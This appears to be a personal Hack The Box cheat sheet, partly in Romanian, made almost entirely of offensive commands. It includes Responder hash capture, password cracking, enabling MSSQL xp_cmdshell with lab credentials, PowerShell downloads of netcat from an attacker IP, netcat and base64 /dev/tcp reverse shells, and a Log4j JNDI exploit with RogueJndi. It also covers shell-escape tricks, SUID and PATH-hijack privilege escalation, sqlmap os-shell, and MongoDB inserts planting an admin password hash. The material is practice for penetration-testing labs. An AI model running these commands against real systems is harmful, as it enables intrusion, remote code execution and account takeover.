Cheat sheet htb
Hack the box cheat sheet
Responder reponder -I interface request file as //ip from responder/somefile
john –wordlist=/usr/share/wordlists/rockyou.txt hashfile evil-wrm connect to windows httpapi
smbmap -H 10.129.74.255 smbclient -L 10.129.74.255 -list shares if no $ sign => non admin share
smbclient //10.129.74.255\backups
impacket-mssqlclient -u ARCHETYPE/sql_svc -p M3g4c0rp123 10.129.230.252 enable_xp_cmdshell
Open a server python python3 python -m http.server 8000 python2 python -m SimpleHTTPServer 8069 xp_cmdshell “powershell.exe /c Invoke-WebRequest -Uri “http://10.10.15.126:8069/winPEASx64.exe” -OutFile “C:\Windows\Temp\sc.exe” “
powershell.exe /c Invoke-WebRequest -Uri “http://10.10.15.126:8069/winPEASx64.exe” -OutFile “C:/Windows/temp/”
powershell.exe /c Invoke-WebRequest -Uri “http://10.10.15.126:8069/nc.exe” -OutFile “C:\Windows\Temp\nc.exe”
nc –lp 8888 nc.exe 10.10.15.126 8888 –e cmd.exe
if the netcat won’t execute 1.xp_cmdshell “ECHO C:\Windows\Temp\nc.exe -e cmd.exe 10.10.15.126 8888 > C:\Windows\Temp\nc.bat” 2.xp_cmdshell “C:\Windows\Temp\nc.bat”
xp_cmdshell “powershell.exe /c Invoke-WebRequest -Uri “http://10.10.15.126:8069/nc.exe” -OutFile “C:\Windows\Temp\nc.exe”
screen file -> to record input/output to file
if you can port 587 or smth evil-winrm -u administrator -p ‘MEGACORP_4dm1n!!’ -i 10.129.244.171
type is like cat for linux
foxyproxy-> enable/disable proxies on the go https://www.revshells.com
10.10.15.126 /bin/bash pe kali-ul tau inainte python3 -c ‘import pty;pty.spawn(“/bin/bash”);’ stty raw -echo export TERM=xterm ctrl+j cand esti in stty raw -echo fish terminal pentru asta ca altfel face urat 888
$ python3 -c ‘import pty; pty.spawn(“/bin/bash”)’ Ctrl-Z
In Kali
$ stty raw -echo $ fg
In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows
#######################################################
Spawning a TTY Shell
#######################################################
python -c ‘import pty; pty.spawn(“/bin/sh”)’
echo os.system(‘/bin/bash’)
/bin/sh -i
perl —e ‘exec “/bin/sh”;’
perl: exec “/bin/sh”;
ruby: exec “/bin/sh”
lua: os.execute(‘/bin/sh’)
(From within IRB)
exec “/bin/sh”
(From within vi)
:!bash
(From within vi)
:set shell=/bin/bash:shell
(From within nmap)
!sh
stty -rows 46 -columns 289
grep -R -i “pass”
find / -group bugtracker 2>/dev/null 66|find / -name root.txt 2>/dev/null
find / -perm -4000 -type f
daca e un exe care executa o comanda schimba path variable in export PATH=/tmp:$PATH si dupa pune un shell acolo
chmod +x ala si gata
zip2john -converts zip hash to john hash
john –wordlist=/usr/share/wordlists/rockyou.txt zip.hash
hashid - identify hash
sudo -l -> what commands as sudo sudo comanda aia si esti root
salveaza requestul intr-un fisier din burp si da sqlmap –os-shell -r new.request
dnslog gives you a dns address for callback dnslog.cn, https://dig.pm/, http://dnslog.xyz/
log4j testing curl -i -s -k -X POST -H $’Host: 10.129.179.73:8443’ -H $’Content-Length: 104’ –data-binary $’{"username":"a","password":"a","remember":"${jndi:ldap://ildckx.dnslog.cn:1389/o=tomcat}","strict":true}’ $’https://10.129.179.73:8443/api/login’ echo ‘bash -c bash -i >&/dev/tcp/10.129.179.126/8888 0>&1’ | base64 java -jar rogue-jndi/target/RogueJndi-1.1.jar –command “bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMTI2Lzg4ODggMD4mMQo=}|{base64,-d}|{bash,-i}” –hostname “10.10.15.126”
curl -i -s -k -X POST -H $’Host: 10.129.179.73:8443’ -H $’Content-Length: 104’ –data-binary $’{"username":"a","password":"a","remember":"${jndi:ldap://10.10.15.126:1389/o=tomcat}","strict":true}’ $’https://10.129.179.73:8443/api/login’
tcpdump -i tun0 port xxxx
db.admin.update({ name: “cat@catcat” }, { $set: { “x_shadow”: “$6$wNBKFIoF/qoFc0/Y$oIKozG1ma1uUX2okypTpNPgB/ijLdRg07Nxs18HAy8FljX5TpIunCnqYJfdcuF3k34ahSfHfk8r5JMOwaAf0m/” } });
db.admin.insert({ “email” : “cat@catson.cat”, “last_site_name” : “default”, “name” : “caty”, “time_created” : NumberLong(100019800), “x_shadow” : “$6$wNBKFIoF/qoFc0/Y$oIKozG1ma1uUX2okypTpNPgB/ijLdRg07Nxs18HAy8FljX5TpIunCnqYJfdcuF3k34ahSfHfk8r5JMOwaAf0m/” }) create a hash: mkpasswd -m sha-512 wpass
Comments